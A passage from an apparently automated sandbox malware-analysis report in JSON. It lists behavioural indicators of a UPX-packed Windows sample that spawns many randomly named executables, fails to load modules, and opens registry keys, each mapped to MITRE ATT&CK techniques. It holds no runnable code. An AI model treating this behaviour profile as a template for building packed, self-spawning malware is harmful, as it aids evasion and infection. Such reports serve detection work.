\"22840.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004588)\n \"22840.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004588)\n \"866846.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003528)\n \"866846.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003528)\n \"866846.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003528)\n \"866846.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003528)\n \"068420.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003296)\n \"068420.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003296)\n \"068420.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003296)\n \"068420.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003296)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084\" has an executable section named \"UPX0\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084\" has an executable section named \"UPX1\"\n \"jvhfn.exe\" has an executable section named \"UPX0\"\n \"jvhfn.exe\" has an executable section named \"UPX1\"\n \"042468.exe\" has an executable section named \"UPX0\"\n \"042468.exe\" has an executable section named \"UPX1\"\n \"2626426.exe\" has an executable section named \"UPX0\"\n \"2626426.exe\" has an executable section named \"UPX1\"\n \"8428466.exe\" has an executable section named \"UPX0\"\n \"8428466.exe\" has an executable section named \"UPX1\"\n \"npxxxd.exe\" has an executable section named \"UPX0\"\n \"npxxxd.exe\" has an executable section named \"UPX1\"\n \"pffjpht.exe\" has an executable section named \"UPX0\"\n \"pffjpht.exe\" has an executable section named \"UPX1\"\n \"vjxrx.exe\" has an executable section named \"UPX0\"\n \"vjxrx.exe\" has an executable section named \"UPX1\"\n \"trnnjf.exe\" has an executable section named \"UPX0\"\n \"trnnjf.exe\" has an executable section named \"UPX1\"\n \"ttfvnn.exe\" has an executable section named \"UPX0\"\n \"ttfvnn.exe\" has an executable section named \"UPX1\"\n \"240606.exe\" has an executable section named \"UPX0\"\n \"240606.exe\" has an executable section named \"UPX1\"\n \"6402288.exe\" has an executable section named \"UPX0\"\n \"6402288.exe\" has an executable section named \"UPX1\"\n \"bttfvf.exe\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084\" has an writable section named \"UPX0\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084\" has an writable section named \"UPX1\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084\" has an writable section named \"UPX2\"\n \"jvhfn.exe\" has an writable section named \"UPX0\"\n \"jvhfn.exe\" has an writable section named \"UPX1\"\n \"jvhfn.exe\" has an writable section named \"UPX2\"\n \"042468.exe\" has an writable section named \"UPX0\"\n \"042468.exe\" has an writable section named \"UPX1\"\n \"042468.exe\" has an writable section named \"UPX2\"\n \"2626426.exe\" has an writable section named \"UPX0\"\n \"2626426.exe\" has an writable section named \"UPX1\"\n \"2626426.exe\" has an writable section named \"UPX2\"\n \"8428466.exe\" has an writable section named \"UPX0\"\n \"8428466.exe\" has an writable section named \"UPX1\"\n \"8428466.exe\" has an writable section named \"UPX2\"\n \"npxxxd.exe\" has an writable section named \"UPX0\"\n \"npxxxd.exe\" has an writable section named \"UPX1\"\n \"npxxxd.exe\" has an writable section named \"UPX2\"\n \"pffjpht.exe\" has an writable section named \"UPX0\"\n \"pffjpht.exe\" has an writable section named \"UPX1\"\n \"pffjpht.exe\" has an writable section named \"UPX2\"\n \"vjxrx.exe\" has an writable section named \"UPX0\"\n \"vjxrx.exe\" has an writable section named \"UPX1\"\n \"vjxrx.exe\" has an writable section named \"UPX2\"\n \"trnnjf.exe\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"hnvpxj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"hnvpxj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"lbjvvjh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"lbjvvjh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"pdvxbf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"pdvxbf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"frdfrrr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"frdfrrr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"464448.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"464448.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jlrnp.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jlrnp.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"686200.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"686200.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"026288.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"026288.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"6088244.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"6088244.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"826268.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"826268.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"phdjp.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"phdjp.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dtlrb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dtlrb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jrfndd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jrfndd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nvphdb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nvphdb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"djlfb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"djlfb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"46420.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"46420.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"208666.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"208666.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"08684.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"08684.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"flrpd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"flrpd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"pjjvtd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"pjjvtd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"tlxll.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"tlxll.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fxrlrh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fxrlrh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nrjljrp.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nrjljrp.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"44266.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"44266.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8682642.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8682642.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"2246640.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"2246640.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"064826.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"064826.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nffhjx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nffhjx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xbnxx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xbnxx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"24642.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"24642.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"22840.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"22840.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"866846.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"866846.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"068420.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"068420.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"2680282.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"hnvpxj.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"hrrnrd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"xxjrxn.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"btpbndn.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"lbjvvjh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"pdvxbf.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"txbxjp.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"frdfrrr.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"464448.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"jlrnp.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"tbxfnh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"fptjxhr.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"ffjhjxx.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"84624.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"4682600.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"2040668.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"686200.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"026288.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"2420222.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"6088244.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"826268.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"phdjp.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000\n \"ldpfr.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 762E0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"2680282.exe\" (UID: 00000000-00003556)\n Spawned process \"hnvpxj.exe\" (UID: 00000000-00006032)\n Spawned process \"hrrnrd.exe\" (UID: 00000000-00004376)\n Spawned process \"xxjrxn.exe\" (UID: 00000000-00004380)\n Spawned process \"btpbndn.exe\" (UID: 00000000-00004120)\n Spawned process \"lbjvvjh.exe\" (UID: 00000000-00006128)\n Spawned process \"pdvxbf.exe\" (UID: 00000000-00006080)\n Spawned process \"txbxjp.exe\" (UID: 00000000-00004372)\n Spawned process \"frdfrrr.exe\" (UID: 00000000-00006060)\n Spawned process \"464448.exe\" (UID: 00000000-00003568)\n Spawned process \"jlrnp.exe\" (UID: 00000000-00005996)\n Spawned process \"tbxfnh.exe\" (UID: 00000000-00004124)\n Spawned process \"fptjxhr.exe\" (UID: 00000000-00004384)\n Spawned process \"ffjhjxx.exe\" (UID: 00000000-00006016)\n Spawned process \"84624.exe\" (UID: 00000000-00003724)\n Spawned process \"4682600.exe\" (UID: 00000000-00004448)\n Spawned process \"2040668.exe\" (UID: 00000000-00004156)\n Spawned process \"686200.exe\" (UID: 00000000-00002528)\n Spawned process \"026288.exe\" (UID: 00000000-00001416)\n Spawned process \"2420222.exe\" (UID: 00000000-00001420)\n Spawned process \"6088244.exe\" (UID: 00000000-00001696)\n Spawned process \"826268.exe\" (UID: 00000000-00002648)\n Spawned process \"phdjp.exe\" (UID: 00000000-00004040)\n Spawned process \"ldpfr.exe\" (UID: 00000000-00002564)\n Spawned process \"dtlrb.exe\" (UID: 00000000-00004496)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"2680282.exe\" (UID: 00000000-00003556)\n Spawned process \"hnvpxj.exe\" (UID: 00000000-00006032)\n Spawned process \"hrrnrd.exe\" (UID: 00000000-00004376)\n Spawned process \"xxjrxn.exe\" (UID: 00000000-00004380)\n Spawned process \"btpbndn.exe\" (UID: 00000000-00004120)\n Spawned process \"lbjvvjh.exe\" (UID: 00000000-00006128)\n Spawned process \"pdvxbf.exe\" (UID: 00000000-00006080)\n Spawned process \"txbxjp.exe\" (UID: 00000000-00004372)\n Spawned process \"frdfrrr.exe\" (UID: 00000000-00006060)\n Spawned process \"464448.exe\" (UID: 00000000-00003568)\n Spawned process \"jlrnp.exe\" (UID: 00000000-00005996)\n Spawned process \"tbxfnh.exe\" (UID: 00000000-00004124)\n Spawned process \"fptjxhr.exe\" (UID: 00000000-00004384)\n Spawned process \"ffjhjxx.exe\" (UID: 00000000-00006016)\n Spawned process \"84624.exe\" (UID: 00000000-00003724)\n Spawned process \"4682600.exe\" (UID: 00000000-00004448)\n Spawned process \"2040668.exe\" (UID: 00000000-00004156)\n Spawned process \"686200.exe\" (UID: 00000000-00002528)\n Spawned process \"026288.exe\" (UID: 00000000-00001416)\n Spawned process \"2420222.exe\" (UID: 00000000-00001420)\n Spawned process \"6088244.exe\" (UID: 00000000-00001696)\n Spawned process \"826268.exe\" (UID: 00000000-00002648)\n Spawned process \"phdjp.exe\" (UID: 00000000-00004040)\n Spawned process \"ldpfr.exe\" (UID: 00000000-00002564)\n Spawned process \"dtlrb.exe\" (UID: 00000000-00004496)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084\" was detected as \"UPX\" and name: \"Packer\"\n \"jvhfn.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"042468.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"2626426.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"8428466.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"npxxxd.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"pffjpht.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"vjxrx.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"trnnjf.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"ttfvnn.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"240606.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"6402288.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"bttfvf.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"hnjnfnj.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rjfjrfn.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"jfhhd.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"6804604.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"42828.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"068420.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"4640804.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"866846.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"22840.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"24642.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"240802.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"tbnhh.exe\" was detected as \"UPX\" and name: \"Packer\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"jvhfn.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"042468.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"2626426.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"8428466.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"npxxxd.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"pffjpht.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"vjxrx.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"trnnjf.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"ttfvnn.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"240606.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"6402288.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"bttfvf.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"hnjnfnj.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rjfjrfn.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"jfhhd.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"6804604.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"42828.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"068420.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"4640804.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"866846.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"22840.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"24642.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"240802.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"tbnhh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"2680282.exe\" trying to access non-existent file \"c:\\FLTLIB.DLL\"\n \"2680282.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"2680282.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"2680282.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"2680282.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"2680282.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" reads file \"c:\\3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" reads file \"c:\\2680282.exe\"\n \"2680282.exe\" reads file \"c:\\2680282.exe\"\n \"2680282.exe\" reads file \"c:\\hnvpxj.exe\"\n \"hnvpxj.exe\" reads file \"c:\\hnvpxj.exe\"\n \"hnvpxj.exe\" reads file \"c:\\hrrnrd.exe\"\n \"hrrnrd.exe\" reads file \"c:\\hrrnrd.exe\"\n \"hrrnrd.exe\" reads file \"c:\\xxjrxn.exe\"\n \"xxjrxn.exe\" reads file \"c:\\xxjrxn.exe\"\n \"xxjrxn.exe\" reads file \"c:\\btpbndn.exe\"\n \"btpbndn.exe\" reads file \"c:\\btpbndn.exe\"\n \"btpbndn.exe\" reads file \"c:\\lbjvvjh.exe\"\n \"lbjvvjh.exe\" reads file \"c:\\lbjvvjh.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\2680282.EXE\"; Key: \"\"; Value: 